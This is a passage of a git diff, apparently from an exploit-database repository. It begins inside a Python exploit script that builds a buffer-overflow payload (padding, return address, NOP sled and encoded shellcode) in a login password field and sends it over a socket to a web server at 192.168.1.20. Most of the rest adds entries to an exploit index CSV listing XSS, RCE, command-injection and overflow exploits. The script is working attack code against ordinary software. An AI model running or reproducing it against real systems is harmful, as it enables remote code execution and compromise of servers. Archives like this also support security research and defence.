+shell +="\x1e\x50\x9e\x9c\x15\xf7\x70\x83\xd7\x6d\x71\x29\x2a\x1a\x9b"
+shell +="\xa2\xf5\x3a\xa4\x68\x9e\xd3\x58\x93\xbe\xb3\xd5\x75\xaa\xa3"
+shell +="\xb3\x2e\x43\x06\xe0\xe6\xf4\x79\xc3\x8c\x3b\xf0\xb3\xd9\xd3"
+shell +="\x4c\xaa\xde\xdc\x4c\xf9\x48\x4b\xc7\xed\x4c\x6a\xd8\x38\xe5"
+shell +="\xfb\x4f\xb7\x64\x49\xf1\xc8\xac\x3b\xf1\x5c\x4b\xea\xa6\xc8"
+shell +="\x51\xcb\x81\x57\xa9\x3e\x92\x9f\x55\xbf\xb8\xd4\x60\x55\x83"
+shell +="\x82\x8c\xb9\x03\x52\xdb\xd3\x03\x3a\xbb\x87\x57\x5f\xc4\x1d"
+shell +="\xc4\xcc\x51\x9e\xbd\xa1\xf2\xf6\x43\x9c\x35\x59\xbb\xcb\x45"
+shell +="\x9e\x43\x8d\x4e\x5e\x87\x58\x97\x15\xee\x59\xac\x36\xed\x77"
+shell +="\xd9\xde\xa8\x12\x60\x83\x4a\xc9\xa7\xba\xc8\xfb\x57\x39\xd0"
+shell +="\x8e\x52\x05\x56\x63\x2f\x16\x33\x83\x9c\x17\x16";
+
+
+payload = "username=AAAAA&password="+"A"*520+"\x83\x0c\x09\x10"+ "\x90" *
+20 + shell +"\x90"*(1400-520-4-20-len(shell))
+req =""
+req += "POST /login HTTP/1.1\r\n"
+req += "Host: 192.168.1.20\r\n"
+req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0\r\n"
+req += "Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+req += "Accept-Language: en-US,en;q=0.5\r\n"
+req += "Accept-Encoding: gzip, deflate\r\n"
+req += "Referer: http://192.168.1.20/login\r\n"
+req += "Content-Type: application/x-www-form-urlencoded\r\n"
+req += "Content-Length: "+str(len(payload))+"\r\n"
+req += "Connection: keep-alive\r\n"
+req += "Upgrade-Insecure-Requests: 1\r\n"
+req += "\r\n"
+req += payload
+# print req
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("192.168.1.20",80))
+s.send(req)
+print s.recv(1024)
+
+s.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4fe526b8a..efd412bf0 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6761,6 +6761,7 @@ id,file,description,date,author,type,platform,port
 48731,exploits/windows/dos/48731.py,"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)",2020-08-05,MegaMagnus,dos,windows,
 48732,exploits/windows/dos/48732.py,"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)",2020-08-05,"Luis Martínez",dos,windows,
 49083,exploits/windows/dos/49083.pl,"Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)",2020-11-19,"Vincent Wolterman",dos,windows,
+49105,exploits/multiple/dos/49105.py,"Pure-FTPd 1.0.48 - Remote Denial of Service",2020-11-26,xynmaps,dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11204,6 +11205,9 @@ id,file,description,date,author,type,platform,port
 49086,exploits/windows/local/49086.py,"IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow",2020-11-20,"Paolo Stagno",local,windows,
 49087,exploits/windows/local/49087.rb,"Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)",2020-11-20,ZwX,local,windows,
 49088,exploits/windows/local/49088.py,"Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit",2020-11-20,stresser,local,windows,
+49089,exploits/windows/local/49089.py,"Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)",2020-11-23,"Luis Martínez",local,windows,
+49100,exploits/windows/local/49100.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-11-24,MasterVlad,local,windows,
+49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18305,6 +18309,7 @@ id,file,description,date,author,type,platform,port
 49068,exploits/multiple/remote/49068.py,"Apache Struts 2.5.20 - Double OGNL evaluation",2020-11-17,"West Shepherd",remote,multiple,
 49071,exploits/windows/remote/49071.py,"ZeroLogon - Netlogon Elevation of Privilege",2020-11-18,"West Shepherd",remote,windows,
 49075,exploits/hardware/remote/49075.py,"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure",2020-11-19,"Nitesh Surana",remote,hardware,
+49106,exploits/windows/remote/49106.py,"Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution",2020-11-26,"Loke Hui Yi",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42984,7 +42989,7 @@ id,file,description,date,author,type,platform,port
 48312,exploits/php/webapps/48312.txt,"Webtateas 2.0 - Arbitrary File Read",2020-04-13,"China Banking and Insurance Information Technology Management Co.",webapps,php,
 48313,exploits/java/webapps/48313.txt,"WSO2 3.1.0 - Arbitrary File Delete",2020-04-13,"Raki Ben Hamouda",webapps,java,
 48315,exploits/php/webapps/48315.txt,"WordPress Plugin Media Library Assistant 2.81 - Local File Inclusion",2020-04-13,"Daniel Monzón",webapps,php,
-48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Noam Moshe",webapps,php,
+48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Aviv Beniash",webapps,php,
 48318,exploits/hardware/webapps/48318.txt,"Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution",2020-04-14,Wadeek,webapps,hardware,
 48319,exploits/java/webapps/48319.txt,"WSO2 3.1.0 - Persistent Cross-Site Scripting",2020-04-14,"Raki Ben Hamouda",webapps,java,
 48320,exploits/java/webapps/48320.py,"Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution",2020-04-14,nu11secur1ty,webapps,java,
@@ -43204,7 +43209,7 @@ id,file,description,date,author,type,platform,port
 48654,exploits/java/webapps/48654.txt,"Exhibitor Web UI 1.7.1 - Remote Code Execution",2020-07-07,"Logan Sanderson",webapps,java,
 48853,exploits/php/webapps/48853.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)",2020-10-02,bzyo,webapps,php,
 48854,exploits/php/webapps/48854.txt,"Photo Share Website 1.0 - Persistent Cross-Site Scripting",2020-10-02,Augkim,webapps,php,
-48855,exploits/multiple/webapps/48855.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-10-05,"Aviv Beniash",webapps,multiple,
+49092,exploits/hardware/webapps/49092.txt,"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass",2020-11-23,malwrforensics,webapps,hardware,
 48856,exploits/php/webapps/48856.py,"SpamTitan 7.07 - Unauthenticated Remote Code Execution",2020-10-05,"Felipe Molina",webapps,php,
 48655,exploits/php/webapps/48655.php,"PHP 7.4 FFI - 'disable_functions' Bypass",2020-07-07,"hunter gregal",webapps,php,
 48656,exploits/php/webapps/48656.txt,"Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting",2020-07-09,mqt,webapps,php,
@@ -43316,3 +43321,14 @@ id,file,description,date,author,type,platform,port
 49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,
 49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,
 49085,exploits/php/webapps/49085.txt,"WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting",2020-11-20,"Hemant Patidar",webapps,php,
+49090,exploits/php/webapps/49090.txt,"VTiger v7.0 CRM - 'To' Persistent XSS",2020-11-23,Vulnerability-Lab,webapps,php,
+49091,exploits/multiple/webapps/49091.txt,"LifeRay 7.2.1 GA2 - Stored XSS",2020-11-23,3ndG4me,webapps,multiple,
+49093,exploits/multiple/webapps/49093.txt,"nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting",2020-11-24,"Hemant Patidar",webapps,multiple,
+49094,exploits/multiple/webapps/49094.txt,"Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service",2020-11-24,SunCSR,webapps,multiple,
+49096,exploits/linux/webapps/49096.rb,"ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)",2020-11-24,"Giuseppe Fuggiano",webapps,linux,
+49097,exploits/hardware/webapps/49097.txt,"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)",2020-11-24,maj0rmil4d,webapps,hardware,
+49098,exploits/php/webapps/49098.txt,"OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated)",2020-11-24,"Hemant Patidar",webapps,php,
+49099,exploits/php/webapps/49099.txt,"OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting",2020-11-24,"Hemant Patidar",webapps,php,
+49102,exploits/php/webapps/49102.txt,"WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting",2020-11-25,"Mayur Parmar",webapps,php,
+49103,exploits/php/webapps/49103.txt,"osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting",2020-11-25,"Emre Aslan",webapps,php,
+49104,exploits/windows/webapps/49104.py,"SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow",2020-11-25,"Abdessalam king",webapps,windows,